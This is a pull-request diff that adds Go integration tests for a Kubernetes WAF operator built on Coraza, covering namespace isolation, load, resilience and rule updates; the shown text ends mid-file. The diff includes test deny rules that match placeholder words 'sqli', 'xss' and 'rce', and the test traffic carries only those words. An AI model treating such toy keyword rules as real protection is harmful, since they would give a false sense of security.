### PR TITLE
Add comprehensive integration test suite with parallel execution support

### DIFF
--- a/test/framework/resources.go
+++ b/test/framework/resources.go
@@ -354,8 +354,22 @@ func (s *Scenario) CreateGatewayWithClass(namespace, name, gatewayClassName stri
 	s.T.Helper()
 	ctx := s.T.Context()
 
+	// Create ServiceAccount before Gateway to prevent auth race condition.
+	// Istio gateway pods use a ServiceAccount named "{gateway-name}-{class}".
+	saName := fmt.Sprintf("%s-%s", name, gatewayClassName)
+	sa := &corev1.ServiceAccount{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      saName,
+			Namespace: namespace,
+		},
+	}
+	_, err := s.F.KubeClient.CoreV1().ServiceAccounts(namespace).Create(ctx, sa, metav1.CreateOptions{})
+	if err != nil {
+		s.T.Logf("ServiceAccount %s/%s creation: %v (may already exist)", namespace, saName, err)
+	}
+
 	obj := BuildGateway(namespace, name, gatewayClassName)
-	_, err := s.F.DynamicClient.Resource(GatewayGVR).Namespace(namespace).Create(
+	_, err = s.F.DynamicClient.Resource(GatewayGVR).Namespace(namespace).Create(
 		ctx, obj, metav1.CreateOptions{},
 	)
 	require.NoError(s.T, err, "create Gateway %s/%s", namespace, name)
@@ -474,6 +488,9 @@ func (s *Scenario) CreateEchoBackend(namespace, name string) {
 			Template: corev1.PodTemplateSpec{
 				ObjectMeta: metav1.ObjectMeta{
 					Labels: map[string]string{"app": name},
+					Annotations: map[string]string{
+						"sidecar.istio.io/inject": "false",
+					},
 				},
 				Spec: corev1.PodSpec{
 					Containers: []corev1.Container{{

--- a/test/framework/scenario.go
+++ b/test/framework/scenario.go
@@ -21,6 +21,7 @@ import (
 	"crypto/rand"
 	"fmt"
 	"io"
+	mathrand "math/rand"
 	"os"
 	"path/filepath"
 	"strings"
@@ -112,6 +113,8 @@ func (s *Scenario) GenerateNamespace(prefix string) string {
 }
 
 // CreateNamespace creates a namespace and registers it for cleanup.
+// A small random delay (0-2s) is added to stagger parallel test starts,
+// reducing contention on Istio CA certificate signing.
 func (s *Scenario) CreateNamespace(name string) {
 	s.T.Helper()
 	ctx := s.T.Context()
@@ -124,6 +127,11 @@ func (s *Scenario) CreateNamespace(name string) {
 
 	s.namespaces = append(s.namespaces, name)
 	s.T.Logf("Created namespace: %s", name)
+
+	// Stagger parallel tests to reduce Istio CA contention.
+	staggerDelay := time.Duration(mathrand.Intn(2000)) * time.Millisecond
+	time.Sleep(staggerDelay)
+
 	s.OnCleanup(func() {
 		// Background: test context may already be cancelled; cleanup must still run.
 		if err := s.F.KubeClient.CoreV1().Namespaces().Delete(

--- a/test/framework/traffic.go
+++ b/test/framework/traffic.go
@@ -21,10 +21,12 @@ import (
 	"fmt"
 	"io"
 	"net/http"
+	"strings"
 	"time"
 
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
+	corev1 "k8s.io/api/core/v1"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/client-go/tools/portforward"
 	"k8s.io/client-go/transport/spdy"
@@ -59,6 +61,9 @@ func (s *Scenario) ProxyToGateway(namespace, gatewayName string) *GatewayProxy {
 		httpc:     &http.Client{Timeout: 10 * time.Second},
 		cancel:    cancel,
 	}
+
+	// Wait for the gateway pod to be Ready before starting port-forward.
+	s.waitForGatewayPodReady(namespace, gatewayName)
 
 	go proxy.maintain(ctx)
 
@@ -156,6 +161,175 @@ type HTTPResult struct {
 	Headers    http.Header
 	Body       []byte
 	Err        error
+}
+
+// Post makes a POST request with the given body through the proxy.
+func (g *GatewayProxy) Post(path, contentType, body string) *HTTPResult {
+	resp, err := g.httpc.Post(g.URL(path), contentType, strings.NewReader(body))
+	if err != nil {
+		return &HTTPResult{Err: err}
+	}
+	defer func() { _ = resp.Body.Close() }()
+	respBody, _ := io.ReadAll(resp.Body)
+	return &HTTPResult{
+		StatusCode: resp.StatusCode,
+		Headers:    resp.Header,
+		Body:       respBody,
+	}
+}
+
+// DoRequest makes a custom HTTP request through the proxy.
+func (g *GatewayProxy) DoRequest(req *http.Request) *HTTPResult {
+	resp, err := g.httpc.Do(req)
+	if err != nil {
+		return &HTTPResult{Err: err}
+	}
+	defer func() { _ = resp.Body.Close() }()
+	body, _ := io.ReadAll(resp.Body)
+	return &HTTPResult{
+		StatusCode: resp.StatusCode,
+		Headers:    resp.Header,
+		Body:       body,
+	}
+}
+
+// GetWithHeaders makes a GET request with custom headers through the proxy.
+func (g *GatewayProxy) GetWithHeaders(path string, headers map[string]string) *HTTPResult {
+	req, err := http.NewRequest(http.MethodGet, g.URL(path), nil)
+	if err != nil {
+		return &HTTPResult{Err: err}
+	}
+	for k, v := range headers {
+		req.Header.Set(k, v)
+	}
+	return g.DoRequest(req)
+}
+
+// PostWithHeaders makes a POST request with custom headers through the proxy.
+func (g *GatewayProxy) PostWithHeaders(path, contentType, body string, headers map[string]string) *HTTPResult {
+	req, err := http.NewRequest(http.MethodPost, g.URL(path), strings.NewReader(body))
+	if err != nil {
+		return &HTTPResult{Err: err}
+	}
+	req.Header.Set("Content-Type", contentType)
+	for k, v := range headers {
+		req.Header.Set(k, v)
+	}
+	return g.DoRequest(req)
+}
+
+// ExpectPostBlocked polls until a POST request returns HTTP 403.
+func (g *GatewayProxy) ExpectPostBlocked(path, contentType, body string) {
+	g.s.T.Helper()
+	g.ExpectPostStatus(path, contentType, body, http.StatusForbidden)
+}
+
+// ExpectPostAllowed polls until a POST request returns HTTP 200.
+func (g *GatewayProxy) ExpectPostAllowed(path, contentType, body string) {
+	g.s.T.Helper()
+	g.ExpectPostStatus(path, contentType, body, http.StatusOK)
+}
+
+// ExpectPostStatus polls until a POST request returns the expected status.
+func (g *GatewayProxy) ExpectPostStatus(path, contentType, body string, code int) {
+	g.s.T.Helper()
+	require.EventuallyWithT(g.s.T, func(collect *assert.CollectT) {
+		resp, err := g.httpc.Post(g.URL(path), contentType, strings.NewReader(body))
+		if !assert.NoError(collect, err) {
+			return
+		}
+		defer func() {
+			_, _ = io.ReadAll(resp.Body)
+			_ = resp.Body.Close()
+		}()
+		assert.Equal(collect, code, resp.StatusCode,
+			"expected POST %s to return %d, got: %d", path, code, resp.StatusCode)
+	}, DefaultTimeout, DefaultInterval)
+}
+
+// ExpectHeaderBlocked polls until a GET with custom headers returns HTTP 403.
+func (g *GatewayProxy) ExpectHeaderBlocked(path string, headers map[string]string) {
+	g.s.T.Helper()
+	g.ExpectHeaderStatus(path, headers, http.StatusForbidden)
+}
+
+// ExpectHeaderAllowed polls until a GET with custom headers returns HTTP 200.
+func (g *GatewayProxy) ExpectHeaderAllowed(path string, headers map[string]string) {
+	g.s.T.Helper()
+	g.ExpectHeaderStatus(path, headers, http.StatusOK)
+}
+
+// ExpectHeaderStatus polls until a GET with custom headers returns the expected status.
+func (g *GatewayProxy) ExpectHeaderStatus(path string, headers map[string]string, code int) {
+	g.s.T.Helper()
+	require.EventuallyWithT(g.s.T, func(collect *assert.CollectT) {
+		req, err := http.NewRequest(http.MethodGet, g.URL(path), nil)
+		if !assert.NoError(collect, err) {
+			return
+		}
+		for k, v := range headers {
+			req.Header.Set(k, v)
+		}
+		resp, err := g.httpc.Do(req)
+		if !assert.NoError(collect, err) {
+			return
+		}
+		defer func() {
+			_, _ = io.ReadAll(resp.Body)
+			_ = resp.Body.Close()
+		}()
+		assert.Equal(collect, code, resp.StatusCode,
+			"expected GET %s with headers to return %d, got: %d", path, code, resp.StatusCode)
+	}, DefaultTimeout, DefaultInterval)
+}
+
+// -----------------------------------------------------------------------------
+// Pod Readiness
+// -----------------------------------------------------------------------------
+
+// GatewayReadyTimeout is a longer timeout for gateway pod readiness.
+// Gateway pods may restart due to Istio CA certificate signing delays
+// when running parallel tests, so we allow extra time for recovery.
+const GatewayReadyTimeout = 1500 * time.Second
+
+// waitForGatewayPodReady waits until at least one pod for the gateway is Ready.
+// This prevents port-forward attempts before Istio sidecar is fully initialized.
+// Uses a longer timeout than default to handle CA certificate signing delays.
+func (s *Scenario) waitForGatewayPodReady(namespace, gatewayName string) {
+	s.T.Helper()
+	labelSelector := fmt.Sprintf("gateway.networking.k8s.io/gateway-name=%s", gatewayName)
+
+	require.Eventually(s.T, func() bool {
+		pods, err := s.F.KubeClient.CoreV1().Pods(namespace).List(
+			s.T.Context(),
+			metav1.ListOptions{LabelSelector: labelSelector},
+		)
+		if err != nil {
+			return false
+		}
+		for _, pod := range pods.Items {
+			if isPodReady(&pod) {
+				return true
+			}
+		}
+		return false
+	}, GatewayReadyTimeout, DefaultInterval,
+		"gateway pod %s/%s not ready", namespace, gatewayName,
+	)
+	s.T.Logf("Gateway pod %s/%s is ready", namespace, gatewayName)
+}
+
+// isPodReady returns true if the pod is in Running phase and has Ready condition.
+func isPodReady(pod *corev1.Pod) bool {
+	if pod.Status.Phase != corev1.PodRunning {
+		return false
+	}
+	for _, cond := range pod.Status.Conditions {
+		if cond.Type == corev1.PodReady && cond.Status == corev1.ConditionTrue {
+			return true
+		}
+	}
+	return false
 }
 
 // -----------------------------------------------------------------------------

--- a/test/integration/isolation_test.go
+++ b/test/integration/isolation_test.go
@@ -1,0 +1,88 @@
+//go:build integration
+
+/*
+Copyright Coraza Kubernetes Operator contributors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package integration
+
+import (
+	"testing"
+
+	"github.com/networking-incubator/coraza-kubernetes-operator/test/framework"
+)
+
+// TestCrossNamespaceIsolation verifies that a RuleSet in namespace A
+// cannot affect a Gateway in namespace B - each namespace is isolated.
+func TestCrossNamespaceIsolation(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	nsA := s.GenerateNamespace("isolation-a")
+	nsB := s.GenerateNamespace("isolation-b")
+
+	// --- Namespace A: Gateway with strict blocking rules ---
+
+	s.Step("create gateway in namespace A")
+	s.CreateGateway(nsA, "gw")
+	s.ExpectGatewayProgrammed(nsA, "gw")
+
+	s.Step("deploy strict blocking rules in namespace A")
+	s.CreateConfigMap(nsA, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(nsA, "strict-rules", framework.SimpleBlockRule(10001, "blocked"))
+	s.CreateRuleSet(nsA, "ruleset", []string{"base-rules", "strict-rules"})
+
+	s.CreateEngine(nsA, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(nsA, "engine")
+
+	s.CreateEchoBackend(nsA, "echo")
+	s.CreateHTTPRoute(nsA, "route", "gw", "echo")
+
+	// --- Namespace B: Gateway with permissive rules ---
+
+	s.Step("create gateway in namespace B")
+	s.CreateGateway(nsB, "gw")
+	s.ExpectGatewayProgrammed(nsB, "gw")
+
+	s.Step("deploy permissive rules in namespace B")
+	s.CreateConfigMap(nsB, "base-rules", `SecRuleEngine On`)
+	// Different rule - only blocks "different-pattern"
+	s.CreateConfigMap(nsB, "permissive-rules", framework.SimpleBlockRule(10002, "different-pattern"))
+	s.CreateRuleSet(nsB, "ruleset", []string{"base-rules", "permissive-rules"})
+
+	s.CreateEngine(nsB, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(nsB, "engine")
+
+	s.CreateEchoBackend(nsB, "echo")
+	s.CreateHTTPRoute(nsB, "route", "gw", "echo")
+
+	// --- Verify isolation ---
+
+	s.Step("verify namespace A blocks 'blocked' pattern")
+	gwA := s.ProxyToGateway(nsA, "gw")
+	gwA.ExpectBlocked("/?test=blocked")
+	gwA.ExpectAllowed("/?test=different-pattern") // A's rules don't block this
+
+	s.Step("verify namespace B has different rules")
+	gwB := s.ProxyToGateway(nsB, "gw")
+	gwB.ExpectAllowed("/?test=blocked")           // B's rules don't block this
+	gwB.ExpectBlocked("/?test=different-pattern") // B blocks this instead
+}

--- a/test/integration/load_test.go
+++ b/test/integration/load_test.go
@@ -1,0 +1,294 @@
+//go:build integration
+
+/*
+Copyright Coraza Kubernetes Operator contributors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package integration
+
+import (
+	"fmt"
+	"net/http"
+	"sync"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/networking-incubator/coraza-kubernetes-operator/test/framework"
+)
+
+// TestHighThroughput sends many concurrent requests to verify that
+// WAF rules are consistently enforced under load.
+func TestHighThroughput(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("high-throughput")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(12001, "blocked"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	// Wait for WAF to be ready
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+
+	s.Step("send 100 concurrent blocked requests")
+	var blockedCount atomic.Int32
+	var blockedErrors atomic.Int32
+
+	var wg sync.WaitGroup
+	for i := 0; i < 100; i++ {
+		wg.Add(1)
+		go func(i int) {
+			defer wg.Done()
+			result := gw.Get(fmt.Sprintf("/?test=blocked&req=%d", i))
+			if result.Err != nil {
+				blockedErrors.Add(1)
+				return
+			}
+			if result.StatusCode == http.StatusForbidden {
+				blockedCount.Add(1)
+			}
+		}(i)
+	}
+	wg.Wait()
+
+	t.Logf("Blocked requests: %d/100, errors: %d", blockedCount.Load(), blockedErrors.Load())
+	assert.GreaterOrEqual(t, blockedCount.Load(), int32(95), "At least 95% of blocked requests should return 403")
+
+	s.Step("send 100 concurrent allowed requests")
+	var allowedCount atomic.Int32
+	var allowedErrors atomic.Int32
+
+	for i := 0; i < 100; i++ {
+		wg.Add(1)
+		go func(i int) {
+			defer wg.Done()
+			result := gw.Get(fmt.Sprintf("/?test=safe&req=%d", i))
+			if result.Err != nil {
+				allowedErrors.Add(1)
+				return
+			}
+			if result.StatusCode == http.StatusOK {
+				allowedCount.Add(1)
+			}
+		}(i)
+	}
+	wg.Wait()
+
+	t.Logf("Allowed requests: %d/100, errors: %d", allowedCount.Load(), allowedErrors.Load())
+	assert.GreaterOrEqual(t, allowedCount.Load(), int32(95), "At least 95% of allowed requests should return 200")
+}
+
+// TestMixedTrafficLoad sends a mix of blocked and allowed requests
+// concurrently to verify consistent WAF behavior.
+func TestMixedTrafficLoad(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("mixed-load")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy multiple rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", `
+SecRule ARGS:attack "@contains sqli" "id:12101,phase:2,deny,status:403,msg:'SQL injection'"
+SecRule ARGS:attack "@contains xss" "id:12102,phase:2,deny,status:403,msg:'XSS'"
+SecRule ARGS:attack "@contains rce" "id:12103,phase:2,deny,status:403,msg:'RCE'"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	// Wait for WAF to be ready
+	gw.ExpectBlocked("/?attack=sqli")
+	gw.ExpectAllowed("/?safe=true")
+
+	s.Step("send mixed traffic")
+
+	type result struct {
+		path         string
+		expected     int
+		actual       int
+		err          error
+		responseTime time.Duration
+	}
+
+	requests := []struct {
+		path     string
+		expected int
+	}{
+		{"/?attack=sqli", http.StatusForbidden},
+		{"/?attack=xss", http.StatusForbidden},
+		{"/?attack=rce", http.StatusForbidden},
+		{"/?safe=true", http.StatusOK},
+		{"/?param=value", http.StatusOK},
+		{"/api/data", http.StatusOK},
+	}
+
+	var wg sync.WaitGroup
+	results := make(chan result, len(requests)*20)
+
+	// Send each request type 20 times concurrently
+	for _, req := range requests {
+		for i := 0; i < 20; i++ {
+			wg.Add(1)
+			go func(path string, expected int) {
+				defer wg.Done()
+				start := time.Now()
+				r := gw.Get(path)
+				results <- result{
+					path:         path,
+					expected:     expected,
+					actual:       r.StatusCode,
+					err:          r.Err,
+					responseTime: time.Since(start),
+				}
+			}(req.path, req.expected)
+		}
+	}
+
+	wg.Wait()
+	close(results)
+
+	s.Step("analyze results")
+	var correct, incorrect, errors int
+	var totalTime time.Duration
+
+	for r := range results {
+		if r.err != nil {
+			errors++
+			continue
+		}
+		totalTime += r.responseTime
+		if r.actual == r.expected {
+			correct++
+		} else {
+			incorrect++
+			t.Logf("Unexpected result: %s expected %d, got %d", r.path, r.expected, r.actual)
+		}
+	}
+
+	total := correct + incorrect + errors
+	t.Logf("Results: %d/%d correct (%.1f%%), %d errors, avg response time: %v",
+		correct, total, float64(correct)/float64(total)*100,
+		errors, totalTime/time.Duration(total))
+
+	require.GreaterOrEqual(t, float64(correct)/float64(total), 0.95,
+		"At least 95%% of requests should have expected response")
+}
+
+// TestSustainedLoad sends requests over a sustained period to verify
+// WAF stability over time.
+func TestSustainedLoad(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("sustained-load")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(12201, "blocked"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectBlocked("/?test=blocked")
+
+	s.Step("send sustained load for 10 seconds")
+	duration := 10 * time.Second
+	deadline := time.Now().Add(duration)
+
+	var blockedCorrect, allowedCorrect, total atomic.Int32
+	var wg sync.WaitGroup
+
+	// Worker pool of 10 concurrent requesters
+	for w := 0; w < 10; w++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			for time.Now().Before(deadline) {
+				total.Add(1)
+
+				// Alternate between blocked and allowed requests
+				if total.Load()%2 == 0 {
+					result := gw.Get("/?test=blocked")
+					if result.Err == nil && result.StatusCode == http.StatusForbidden {
+						blockedCorrect.Add(1)
+					}
+				} else {
+					result := gw.Get("/?test=safe")
+					if result.Err == nil && result.StatusCode == http.StatusOK {
+						allowedCorrect.Add(1)
+					}
+				}
+			}
+		}()
+	}
+
+	wg.Wait()
+
+	correctTotal := blockedCorrect.Load() + allowedCorrect.Load()
+	t.Logf("Sustained load: %d total requests, %d correct (%.1f%%), blocked=%d, allowed=%d",
+		total.Load(), correctTotal, float64(correctTotal)/float64(total.Load())*100,
+		blockedCorrect.Load(), allowedCorrect.Load())
+
+	assert.GreaterOrEqual(t, float64(correctTotal)/float64(total.Load()), 0.90,
+		"At least 90%% of requests should have correct response under sustained load")
+}

--- a/test/integration/resilience_test.go
+++ b/test/integration/resilience_test.go
@@ -1,0 +1,246 @@
+//go:build integration
+
+/*
+Copyright Coraza Kubernetes Operator contributors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package integration
+
+import (
+	"context"
+	"fmt"
+	"testing"
+	"time"
+
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+
+	"github.com/networking-incubator/coraza-kubernetes-operator/test/framework"
+)
+
+// TestRapidRuleUpdates verifies that rapidly updating ConfigMap rules
+// multiple times results in the final state being correctly applied.
+func TestRapidRuleUpdates(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("rapid-updates")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy initial rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(11001, "initial"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectBlocked("/?test=initial")
+
+	s.Step("perform 10 rapid rule updates")
+	for i := 1; i <= 10; i++ {
+		pattern := fmt.Sprintf("pattern-%d", i)
+		s.UpdateConfigMap(ns, "block-rules", framework.SimpleBlockRule(11001+i, pattern))
+		// Small delay to allow some processing, but rapid enough to test race conditions
+		time.Sleep(100 * time.Millisecond)
+	}
+
+	s.Step("verify final state is applied")
+	// Wait a bit for reconciliation to settle
+	time.Sleep(2 * time.Second)
+
+	// Final pattern should be "pattern-10"
+	gw.ExpectBlocked("/?test=pattern-10")
+
+	// Previous patterns should no longer be blocked
+	gw.ExpectAllowed("/?test=pattern-1")
+	gw.ExpectAllowed("/?test=pattern-5")
+	gw.ExpectAllowed("/?test=initial")
+}
+
+// TestGatewayPodRestart verifies that WAF rules re-apply after
+// a Gateway pod is restarted.
+func TestGatewayPodRestart(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("gw-restart")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(11201, "blocked"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	s.Step("verify WAF is working before restart")
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+
+	s.Step("delete gateway pods to simulate restart")
+	pods, err := s.F.KubeClient.CoreV1().Pods(ns).List(
+		context.Background(),
+		metav1.ListOptions{
+			LabelSelector: fmt.Sprintf("gateway.networking.k8s.io/gateway-name=%s", "gw"),
+		},
+	)
+	if err != nil {
+		t.Fatalf("failed to list gateway pods: %v", err)
+	}
+
+	for _, pod := range pods.Items {
+		err := s.F.KubeClient.CoreV1().Pods(ns).Delete(
+			context.Background(), pod.Name, metav1.DeleteOptions{},
+		)
+		if err != nil {
+			t.Logf("failed to delete pod %s: %v", pod.Name, err)
+		}
+	}
+
+	s.Step("wait for gateway to be ready again")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("verify WAF rules re-apply after restart")
+	// The proxy will reconnect to the new pod
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+}
+
+// TestEngineRecreateAfterGateway verifies that creating a Gateway after
+// the Engine exists properly applies WAF rules.
+func TestEngineRecreateAfterGateway(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("engine-first")
+
+	s.Step("deploy rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(11301, "blocked"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.Step("create engine before gateway exists")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+	s.ExpectEngineGateways(ns, "engine", nil) // No gateways yet
+
+	s.Step("create gateway after engine")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("verify engine discovers the gateway")
+	s.ExpectEngineGateways(ns, "engine", []string{"gw"})
+
+	s.Step("deploy backend")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	s.Step("verify WAF is enforced")
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+}
+
+// TestConcurrentRuleSetUpdates verifies that updating multiple RuleSets
+// concurrently doesn't cause issues.
+func TestConcurrentRuleSetUpdates(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("concurrent")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	// Create 3 independent engines with their own rulesets
+	engines := []struct {
+		name    string
+		pattern string
+		ruleID  int
+	}{
+		{"engine-1", "alpha", 11401},
+		{"engine-2", "beta", 11402},
+		{"engine-3", "gamma", 11403},
+	}
+
+	s.Step("deploy multiple engines with separate rulesets")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+
+	for _, e := range engines {
+		s.CreateConfigMap(ns, fmt.Sprintf("rules-%s", e.name), framework.SimpleBlockRule(e.ruleID, e.pattern))
+		s.CreateRuleSet(ns, fmt.Sprintf("ruleset-%s", e.name), []string{"base-rules", fmt.Sprintf("rules-%s", e.name)})
+		s.CreateEngine(ns, e.name, framework.EngineOpts{
+			RuleSetName: fmt.Sprintf("ruleset-%s", e.name),
+			GatewayName: "gw",
+		})
+		s.ExpectEngineReady(ns, e.name)
+	}
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	s.Step("verify initial state")
+	gw.ExpectBlocked("/?test=alpha")
+	gw.ExpectBlocked("/?test=beta")
+	gw.ExpectBlocked("/?test=gamma")
+
+	s.Step("update all rulesets concurrently")
+	// Update all ConfigMaps rapidly
+	for i, e := range engines {
+		newPattern := fmt.Sprintf("updated-%d", i+1)
+		s.UpdateConfigMap(ns, fmt.Sprintf("rules-%s", e.name), framework.SimpleBlockRule(e.ruleID+100, newPattern))
+	}
+
+	s.Step("wait for reconciliation")
+	time.Sleep(3 * time.Second)
+
+	s.Step("verify all updates applied correctly")
+	gw.ExpectBlocked("/?test=updated-1")
+	gw.ExpectBlocked("/?test=updated-2")
+	gw.ExpectBlocked("/?test=updated-3")
+
+	// Old patterns should no longer be blocked
+	gw.ExpectAllowed("/?test=alpha")
+	gw.ExpectAllowed("/?test=beta")
+	gw.ExpectAllowed("/?test=gamma")
+}

--- a/test/integration/ruleset_lifecycle_test.go
+++ b/test/integration/ruleset_lifecycle_test.go
@@ -1,0 +1,261 @@
+//go:build integration
+
+/*
+Copyright Coraza Kubernetes Operator contributors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package integration
+
+import (
+	"context"
+	"net/url"
+	"testing"
+
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+
+	"github.com/networking-incubator/coraza-kubernetes-operator/test/framework"
+)
+
+// TestRuleSetDeletion verifies graceful handling when a RuleSet is deleted
+// while an Engine still references it.
+func TestRuleSetDeletion(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("ruleset-delete")
+
